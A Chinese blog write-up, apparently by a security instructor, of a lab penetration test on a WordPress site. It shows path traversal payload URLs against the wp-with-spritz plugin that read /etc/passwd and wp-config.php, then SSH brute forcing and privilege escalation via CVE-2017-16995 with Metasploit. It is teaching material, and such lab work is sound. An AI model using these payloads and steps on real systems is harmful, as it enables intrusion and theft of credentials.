学习网络安全:记一次某网站渗透测试过程

本文作者:

汇智知了堂信安教学老师------辉哥

一、信息收集

网站界面


2.

网站信息收集

(1)中间件信息

(2)目录扫描

思路:由于是cms的站,针对这种情况,我们可以收集cms的默认目录结构来进行爆破或手动进行尝试

(3)专用工具扫描(wpscan)

服务器信息收集

(1)nmap 扫描

二、漏洞确认

统合收集的信息

(1)网站目录收集比较全

(2)知道各种中间件的版本

(3)Cms中存在插件可以下手

(4)端口打开有22、20、3389

(5)系统版本已知

确认漏洞

(1)根据wpscan报告来看插件wp-with-spritz 1.0存在文件遍历漏洞

漏洞文章:https://cxsecurity.com/issue/WLB-2018040215

思路:结合cms默认的目录结构可能可以获得敏感信息

(2)SSH弱密码爆破

思路:结合文件遍历漏洞,得到/etc/passwd中的用户

三、漏洞复现

利用插件的文件遍历漏洞

Payload1:

http://192.168.7.111//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

得到用户名webtester 可以用来SSH暴力破解

Payload2:

http://192.168.7.111/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php

点击查看源代码

得到数据库名、账号和密码和flag

没有开数据库的端口,所以还是得先登录上去,只有SSH爆破了。。。。。。。

SSH爆破

得到密码

登录SSH

看看数据库

mysql --u root --p

提权

(1)查看系统内核信息

uname --a

lsb_release --a

(2)查看存在的提权漏洞

由于是ubuntu 16.04,存在cve-2017-16995本地提权漏洞漏洞,在msf中有相应的模块

先使用msf的ssh爆破功能创建会话

文章链接:https://blog.csdn.net/qq_24314631/article/details/79590177

(3)利用msf模块提权

先使用msf的ssh爆破模块登录ssh创建会话

创建会话后,使用提权模块进行提权

完成提权,找到最后的flag

相关推荐
企业通用软件开发10 分钟前
大语言模型提示词工程学习--写小说系列(文心一言&豆包&通义千问):2~确定核心谜团
学习·语言模型·ai应用·ai编写长篇小说·大语言模型应用
一只小菜鸡..1 小时前
241125学习日志——[CSDIY] [ByteDance] 后端训练营 [16]
学习
熬了夜的程序员1 小时前
使用Go语言实现线程安全的Map
安全·golang
索迪迈科技1 小时前
渣土车治理新方案:智能化引领安全与环保新时代
人工智能·安全·音视频·视频监控·车载监控·车辆安全
The博宇2 小时前
真实网络安全面试场景题
安全·web安全
蓝奥声科技2 小时前
智能显示屏插座:能否成为家庭用电安全的守护天使?
物联网·安全·边缘计算
K3njuan2 小时前
《数据结构》学习系列——图(中)
数据结构·学习·深度优先
終不似少年遊*2 小时前
数学知识1
人工智能·学习·算法·机器学习·数学建模
.......xxx2 小时前
arm学习总结
linux·arm开发·学习
跳跳的向阳花2 小时前
Ajax学习笔记,第一节:语法基础
笔记·学习·ajax·axios